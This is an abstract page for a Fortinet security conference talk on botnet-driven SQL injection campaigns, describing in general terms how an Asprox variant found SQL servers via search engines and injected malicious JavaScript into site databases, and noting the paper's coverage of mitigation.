Botnet-powered SQL injection attacks: a deeper look within

David Maciejak Fortinet
Guillaume Lovet Fortinet

  download slides (PDF)

Looking back, the past year has seen botnet-powered SQL injection attacks reaching a rampant level, sparing no category of websites in their malicious code injection campaigns. With several millions of reported attempts from several hundreds of thousands of IP addresses, and successfully compromised websites ranging from MTV to the Canadian National Defence, few other threats can boast as high a profile.

Looking within, the threat's internals reveal a sophisticated technique and a steady evolution. As early as May 2008, a new Asprox botnet variant acquired an interesting - and previously unseen - behaviour: it started to look for SQL servers via search engines, such as Google. Once found, it would attempt to perform an SQL injection attack on those, following a simple, yet effective scenario: an HTTP Get request is issued as an attempt to inject some malicious Javascript in the content database, which is used to provide data front end to the final user. The blind requests may be repeated with varied parameters, effectively making this early version of the threat a 'brute force' attack.

This paper dissects the attack at a fairly technical level, elaborates on its evolution up to now, and discusses the protection and mitigation strategies relevant to its class.


We have placed cookies on your device in order to improve the functionality of this site, as outlined in our cookies policy. However, you may delete and block all cookies from this site and your use of the site will be unaffected. By continuing to browse this site, you are agreeing to Virus Bulletin's use of data as outlined in our privacy policy.